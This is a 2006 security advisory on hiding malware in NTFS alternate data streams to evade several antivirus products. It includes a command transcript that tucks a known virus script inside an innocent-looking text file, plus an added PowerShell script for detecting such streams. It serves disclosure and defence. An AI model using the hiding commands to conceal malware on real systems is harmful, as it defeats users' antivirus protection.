
ntfsstealth.txt
Posted Jun 5, 2006
Authored by Joxean Koret

Various antivirus products, including Panda, ClamWin, Norman Virus Control, and AVG Antivirus, are all susceptible to a bypass vulnerability.

tags | advisory, virus, bypass
SHA-256 | c76c390286fcb06d013752562c0285f7c4b1f845c3c50d9b7b0af3a425999224

Multiple Vendor NTFS Data Stream Malware Stealth Technique
----------------------------------------------------------

Affected product/vendors:

Panda Software. All products.
ClamWin. All versions.
Norman Virus Control. All versions.
AVG Antivirus.

Non-affected vendors:

McAfee / Computer Associates
Avira Antivir PersonalEdition Classic

Technique Description
----------------------

This is not in any way a new technique: the first proof of concept of hiding malware in an NTFS
data stream was published in 2000. Apparently the technique was not very popular, and because of
this 75% (or more) of the anti-virus industry has ignored it.

The technique is as simple as follows. Download a virus file, even an old one. Call it, for example,
'iloveyou.vbs'. Next, go to a command prompt:

------------------------------------------------------------------------------------------------------
C:\>echo I'm an inocent file. > file.txt

C:\>type file.txt
I'm an inocent file.

C:\>dir
Volume in drive C has no label.
Volume Serial Number is 8475-DDEF

Directory of C:\

06/03/2006 01:10 <DIR> Documents and Settings
03/06/2006 05:10 23 file.txt
03/06/2006 04:52 10.320 iloveyou.txt
03/06/2006 04:52 10.320 iloveyou.vbs
26/12/2005 00:51 <DIR> Inetpub
03/06/2006 05:09 <DIR> Program Files
29/05/2006 23:24 12 test1.vbs
03/06/2006 05:06 <DIR> WINNT
4 File(s) 20.675 bytes
4 Dir(s) 2.539.368.448 bytes free

C:\>type iloveyou.vbs > file.txt:virus.vbs

C:\>type file.txt
I'm an inocent file.

C:\>more < file.txt:virus.vbs
rem barok -loveletter(vbe) <i hate go to school>
rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group /
(...)
---More---
------------------------------------------------------------------------------------------------------


Now, try scanning your system with your preferred vulnerable antivirus product. The original file
'iloveyou.vbs', stored in a normal data stream, will (surely) be detected, but the copy of it stored
in an alternate data stream of the apparently innocent file c:\file.txt will not.
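
To check a volume for content stored the way the transcript above shows, a defender can enumerate
named streams directly instead of relying on the scanner. The following PowerShell script is an added
example, not part of the original advisory; it assumes PowerShell 3.0 or later on an NTFS volume, and
the $Root parameter and the extension pattern are illustrative choices.

```powershell
# Added example: list named NTFS alternate data streams on files under a directory.
# Assumes PowerShell 3.0+ (Get-Item -Stream) and an NTFS volume.
param(
    [string]$Root = 'C:\'   # assumption: directory to scan; adjust as needed
)

# Stream names ending in a script or executable extension deserve a closer look.
# Illustrative pattern only; -match is case-insensitive by default.
$suspectPattern = '\.(vbs|vbe|js|exe|dll|bat|cmd|ps1|scr)$'

Get-ChildItem -LiteralPath $Root -Recurse -File -Force -ErrorAction SilentlyContinue |
    ForEach-Object {
        # -Stream * returns one object per stream, including the default one.
        Get-Item -LiteralPath $_.FullName -Stream * -ErrorAction SilentlyContinue
    } |
    Where-Object { $_.Stream -ne ':$DATA' } |   # drop the default, unnamed stream
    ForEach-Object {
        [pscustomobject]@{
            File    = $_.FileName
            Stream  = $_.Stream
            Length  = $_.Length
            Suspect = ($_.Stream -match $suspectPattern)
        }
    } |
    Sort-Object -Property Suspect, Length -Descending |
    Format-Table -AutoSize
```

For the file created in the transcript, the output would include a row for c:\file.txt with stream
virus.vbs. Streams named Zone.Identifier are written by Windows itself on downloaded files and are
expected noise in the listing.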


Disclaimer
----------

The information in this advisory and any of its
demonstrations is provided "as is" without any
warranty of any kind.

I am not liable for any direct or indirect damages
caused as a result of using the information or
demonstrations provided in any part of this advisory.

---------------------------------------------------------------------------

Contact
-------

Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<<dot>>>>>es